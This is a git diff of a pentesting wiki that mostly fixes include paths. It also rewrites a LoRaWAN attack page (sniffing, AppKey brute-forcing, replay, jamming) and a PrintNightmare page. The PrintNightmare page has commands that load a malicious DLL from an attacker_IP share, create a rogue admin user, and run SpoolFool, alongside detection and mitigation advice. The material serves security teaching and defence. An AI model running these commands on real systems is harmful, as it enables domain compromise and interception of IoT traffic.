- [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)
@ -784,4 +843,7 @@ https://github.com/luisfontes19/xxexploiter
- [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)
- [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)
- [Dojo CTF Challenge #42 Hex Color Palette XXE write-up](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-42)
- [lxml bug #2107279 Parameter-entity XXE still possible](https://bugs.launchpad.net/lxml/+bug/2107279)
{{#include ../banners/hacktricks-training.md}}

4
src/todo/hardware-hacking/fault_injection_attacks.md
View File

@ -1,6 +1,6 @@
# Fault Injection Attacks
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
Fault injections attacks includes introducing external distrubance in electronic circuits to influence it's behaviour, resulting to disclose information or even bypass certian restrictions in the circuit. This attacks opens a lot of possibilities for attacking electronic circuits. This attack is also referred as glitching of electronic circuits.
@ -8,4 +8,4 @@ There are a lot of methods and mediums for injecting fault into an electronic ci
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/todo/hardware-hacking/side_channel_analysis.md
View File

@ -1,6 +1,6 @@
# Side Channel Analysis Attacks
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
Side Channel Analysis Attacks refers to determining the information from a device or entity by some other channel or source that has an indirect influence on it and information can be extracted from it. This can be explained better with an example:
@ -10,4 +10,4 @@ These attacks are very popular in case of leaking data such as private keys or f
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

5
src/todo/industrial-control-systems-hacking/README.md
View File

@ -1,6 +1,6 @@
# Industrial Control Systems Hacking
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## About this Section
@ -18,5 +18,4 @@ These techniques can also be used to protect against attacks and blue teaming fo
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

5
src/todo/industrial-control-systems-hacking/modbus.md
View File

@ -1,6 +1,6 @@
# The Modbus Protocol
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Introduction to Modbus Protocol
@ -34,6 +34,5 @@ Due to it's large scale use and lack of upgradations, attacking Modbus provides
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

4
src/todo/investment-terms.md
View File

@ -1,6 +1,6 @@
# Investment Terms
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
## Spot
@ -71,4 +71,4 @@ However, the buyer will be paying some fee to the seller for opening the option
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

3
src/todo/radio-hacking/README.md
View File

@ -1,6 +1,5 @@
# Radio Hacking
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

5
src/todo/radio-hacking/fissure-the-rf-framework.md
View File

@ -1,6 +1,6 @@
# FISSURE - The RF Framework
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
**Frequency Independent SDR-based Signal Understanding and Reverse Engineering**
@ -187,5 +187,4 @@ Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

94
src/todo/radio-hacking/low-power-wide-area-network.md
View File

@ -4,16 +4,96 @@
## Introduction
**Low-Power Wide Area Network** (LPWAN) is a group of wireless, low-power, wide area network technologies designed for **long-range communications** at a low bit rate.\
**Low-Power Wide Area Network** (LPWAN) is a group of wireless, low-power, wide-area network technologies designed for **long-range communications** at a low bit rate.
They can reach more than **six miles** and their **batteries** can last up to **20 years**.
Long Range (**LoRa**) its popular in multiple countries and has an open source specification called **LoRaWAN**.
Long Range (**LoRa**) is currently the most deployed LPWAN physical layer and its open MAC-layer specification is **LoRaWAN**.
### LPWAN, LoRa, and LoRaWAN
---
[https://github.com/IOActive/laf](https://github.com/IOActive/laf)
## LPWAN, LoRa, and LoRaWAN
* LoRa Chirp Spread Spectrum (CSS) physical layer developed by Semtech (proprietary but documented).
* LoRaWAN Open MAC/Network layer maintained by the LoRa-Alliance. Versions 1.0.x and 1.1 are common in the field.
* Typical architecture: *end-device → gateway (packet-forwarder) → network-server → application-server*.
> The **security model** relies on two AES-128 root keys (AppKey/NwkKey) that derive session keys during the *join* procedure (OTAA) or are hard-coded (ABP). If any key leaks the attacker gains full read/write capability over the corresponding traffic.
---
## Attack surface summary
| Layer | Weakness | Practical impact |
|-------|----------|------------------|
| PHY | Reactive / selective jamming | 100 % packet loss demonstrated with single SDR and <1 W output |
| MAC | Join-Accept & data-frame replay (nonce reuse, ABP counter rollover) | Device spoofing, message injection, DoS |
| Network-Server | Insecure packet-forwarder, weak MQTT/UDP filters, outdated gateway firmware | RCE on gateways → pivot into OT/IT network |
| Application | Hard-coded or predictable AppKeys | Brute-force/decrypt traffic, impersonate sensors |
---
## Recent vulnerabilities (2023-2025)
* **CVE-2024-29862** *ChirpStack gateway-bridge & mqtt-forwarder* accepted TCP packets that bypassed stateful firewall rules on Kerlink gateways, allowing remote management interface exposure. Fixed in 4.0.11 / 4.2.1 respectively .
* **Dragino LG01/LG308 series** Multiple 2022-2024 CVEs (e.g. 2022-45227 directory traversal, 2022-45228 CSRF) still observed unpatched in 2025; enable unauthenticated firmware dump or config overwrite on thousands of public gateways .
* Semtech *packet-forwarder UDP* overflow (unreleased advisory, patched 2023-10): crafted uplink larger than 255 B triggered stack-smash > RCE on SX130x reference gateways (found by Black Hat EU 2023 “LoRa Exploitation Reloaded”).
---
## Practical attack techniques
### 1. Sniff & Decrypt traffic
```bash
# Capture all channels around 868.3 MHz with an SDR (USRP B205)
python3 lorattack/sniffer.py \
--freq 868.3e6 --bw 125e3 --rate 1e6 --sf 7 --session smartcity
# Bruteforce AppKey from captured OTAA join-request/accept pairs
python3 lorapwn/bruteforce_join.py --pcap smartcity.pcap --wordlist top1m.txt
```
### 2. OTAA join-replay (DevNonce reuse)
1. Capture a legitimate **JoinRequest**.
2. Immediately retransmit it (or increment RSSI) before the original device transmits again.
3. The network-server allocates a new DevAddr & session keys while the target device continues with the old session → attacker owns vacant session and can inject forged uplinks.
### 3. Adaptive Data-Rate (ADR) downgrading
Force SF12/125 kHz to increase airtime → exhaust duty-cycle of gateway (denial-of-service) while keeping battery impact low on attacker (just send network-level MAC commands).
### 4. Reactive jamming
*HackRF One* running GNU Radio flowgraph triggers a wide-band chirp whenever preamble detected blocks all spreading factors with ≤200 mW TX; full outage measured at 2 km range .
---
## Offensive tooling (2025)
| Tool | Purpose | Notes |
|------|---------|-------|
| **LoRaWAN Auditing Framework (LAF)** | Craft/parse/attack LoRaWAN frames, DB-backed analyzers, brute-forcer | Docker image, supports Semtech UDP input |
| **LoRaPWN** | Trend Micro Python utility to brute OTAA, generate downlinks, decrypt payloads | Demo released 2023, SDR-agnostic |
| **LoRAttack** | Multi-channel sniffer + replay with USRP; exports PCAP/LoRaTap | Good Wireshark integration |
| **gr-lora / gr-lorawan** | GNU Radio OOT blocks for baseband TX/RX | Foundation for custom attacks |
---
## Defensive recommendations (pentester checklist)
1. Prefer **OTAA** devices with truly random DevNonce; monitor duplicates.
2. Enforce **LoRaWAN 1.1**: 32-bit frame counters, distinct FNwkSIntKey / SNwkSIntKey.
3. Store frame-counter in non-volatile memory (**ABP**) or migrate to OTAA.
4. Deploy **secure-element** (ATECC608A/SX1262-TRX-SE) to protect root keys against firmware extraction.
5. Disable remote UDP packet-forwarder ports (1700/1701) or restrict with WireGuard/VPN.
6. Keep gateways updated; Kerlink/Dragino provide 2024-patched images.
7. Implement **traffic anomaly detection** (e.g., LAF analyzer) flag counter resets, duplicate joins, sudden ADR changes.
## References
* LoRaWAN Auditing Framework (LAF) https://github.com/IOActive/laf
* Trend Micro LoRaPWN overview https://www.hackster.io/news/trend-micro-finds-lorawan-security-lacking-develops-lorapwn-python-utility-bba60c27d57a
{{#include ../../banners/hacktricks-training.md}}

5
src/todo/rust-basics.md
View File

@ -1,6 +1,6 @@
# Rust Basics
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
### Generic Types
@ -320,5 +320,4 @@ fn main() {
```
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

5
src/todo/test-llms.md
View File

@ -1,6 +1,6 @@
# Test LLMs
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
## Run & train models locally
@ -52,5 +52,4 @@ It offers several sections like:
* **API Access:** Simple APIs for running models the enable developers to deploy and scale models effortlessly within their own applications.
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

4
src/windows-hardening/active-directory-methodology/TimeRoasting.md
View File

@ -1,6 +1,6 @@
# TimeRoasting
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
timeRoasting, the main cause is the outdated authentication mechanism left by Microsoft in its extension to NTP servers, known as MS-SNTP. In this mechanism, clients can directly use any computer account's Relative Identifier (RID), and the domain controller will use the computer account's NTLM hash (generated by MD4) as the key to generate the **Message Authentication Code (MAC)** of the response packet.
@ -39,4 +39,4 @@ sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt
hashcat -m 31300 ntp-hashes.txt
```
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

106
src/windows-hardening/active-directory-methodology/printnightmare.md
View File

@ -1,10 +1,106 @@
# PrintNightmare
# PrintNightmare (Windows Print Spooler RCE/LPE)
{{#include ../../banners/hacktricks-training.md}}
**Check this awesome blog post about PrintNightmare in 2024: [https://www.hackingarticles.in/understanding-printnightmare-vulnerability/](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)**
> PrintNightmare is the collective name given to a family of vulnerabilities in the Windows **Print Spooler** service that allow **arbitrary code execution as SYSTEM** and, when the spooler is reachable over RPC, **remote code execution (RCE) on domain controllers and file servers**. The most-widely exploited CVEs are **CVE-2021-1675** (initially classed as LPE) and **CVE-2021-34527** (full RCE). Subsequent issues such as **CVE-2021-34481 (“Point & Print”)** and **CVE-2022-21999 (“SpoolFool”)** prove that the attack surface is still far from closed.
---
## 1. Vulnerable components & CVEs
| Year | CVE | Short name | Primitive | Notes |
|------|-----|------------|-----------|-------|
|2021|CVE-2021-1675|“PrintNightmare #1”|LPE|Patched in June 2021 CU but bypassed by CVE-2021-34527|
|2021|CVE-2021-34527|“PrintNightmare”|RCE/LPE|AddPrinterDriverEx allows authenticated users to load a driver DLL from a remote share|
|2021|CVE-2021-34481|“Point & Print”|LPE|Unsigned driver installation by non-admin users|
|2022|CVE-2022-21999|“SpoolFool”|LPE|Arbitrary directory creation → DLL planting works after 2021 patches|
All of them abuse one of the **MS-RPRN / MS-PAR RPC methods** (`RpcAddPrinterDriver`, `RpcAddPrinterDriverEx`, `RpcAsyncAddPrinterDriver`) or trust relationships inside **Point & Print**.
## 2. Exploitation techniques
### 2.1 Remote Domain Controller compromise (CVE-2021-34527)
An authenticated but **non-privileged** domain user can run arbitrary DLLs as **NT AUTHORITY\SYSTEM** on a remote spooler (often the DC) by:
```powershell
# 1. Host malicious driver DLL on a share the victim can reach
impacket-smbserver share ./evil_driver/ -smb2support
# 2. Use a PoC to call RpcAddPrinterDriverEx
python3 CVE-2021-1675.py victim_DC.domain.local 'DOMAIN/user:Password!' \
-f \
'\\attacker_IP\share\evil.dll'
```
Popular PoCs include **CVE-2021-1675.py** (Python/Impacket), **SharpPrintNightmare.exe** (C#) and Benjamin Delpys `misc::printnightmare / lsa::addsid` modules in **mimikatz**.
### 2.2 Local privilege escalation (any supported Windows, 2021-2024)
The same API can be called **locally** to load a driver from `C:\Windows\System32\spool\drivers\x64\3\` and achieve SYSTEM privileges:
```powershell
Import-Module .\Invoke-Nightmare.ps1
Invoke-Nightmare -NewUser hacker -NewPassword P@ssw0rd!
```
### 2.3 SpoolFool (CVE-2022-21999) bypassing 2021 fixes
Microsofts 2021 patches blocked remote driver loading but **did not harden directory permissions**. SpoolFool abuses the `SpoolDirectory` parameter to create an arbitrary directory under `C:\Windows\System32\spool\drivers\`, drops a payload DLL, and forces the spooler to load it:
```powershell
# Binary version (local exploit)
SpoolFool.exe -dll add_user.dll
# PowerShell wrapper
Import-Module .\SpoolFool.ps1 ; Invoke-SpoolFool -dll add_user.dll
```
> The exploit works on fully-patched Windows 7 → Windows 11 and Server 2012R2 → 2022 before February 2022 updates
---
## 3. Detection & hunting
* **Event Logs** enable the *Microsoft-Windows-PrintService/Operational* and *Admin* channels and watch for **Event ID 808** “The print spooler failed to load a plug-in module” or for **RpcAddPrinterDriverEx** messages.
* **Sysmon** `Event ID 7` (Image loaded) or `11/23` (File write/delete) inside `C:\Windows\System32\spool\drivers\*` when the parent process is **spoolsv.exe**.
* **Process lineage** alerts whenever **spoolsv.exe** spawns `cmd.exe`, `rundll32.exe`, PowerShell or any unsigned binary .
## 4. Mitigation & hardening
1. **Patch!** Apply the latest cumulative update on every Windows host that has the Print Spooler service installed.
2. **Disable the spooler where it is not required**, especially on Domain Controllers:
```powershell
Stop-Service Spooler -Force
Set-Service Spooler -StartupType Disabled
```
3. **Block remote connections** while still allowing local printing Group Policy: `Computer Configuration → Administrative Templates → Printers → Allow Print Spooler to accept client connections = Disabled`.
4. **Restrict Point & Print** so only administrators can add drivers by setting the registry value:
```cmd
reg add "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" \
/v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 1 /f
```
Detailed guidance in Microsoft KB5005652
---
## 5. Related research / tools
* [mimikatz `printnightmare`](https://github.com/gentilkiwi/mimikatz/tree/master/modules) modules
* SharpPrintNightmare (C#) / Invoke-Nightmare (PowerShell)
* SpoolFool exploit & write-up
* 0patch micropatches for SpoolFool and other spooler bugs
---
**More reading (external):** Check the 2024 walk-through blog post [Understanding PrintNightmare Vulnerability](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)
## References
* Microsoft *KB5005652: Manage new Point & Print default driver installation behavior*
<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>
* Oliver Lyak *SpoolFool: CVE-2022-21999*
<https://github.com/ly4k/SpoolFool>
{{#include ../../banners/hacktricks-training.md}}

5
src/windows-hardening/cobalt-strike.md
View File

@ -1,6 +1,6 @@
# Cobalt Strike
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
### Listeners
@ -371,5 +371,4 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
```
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}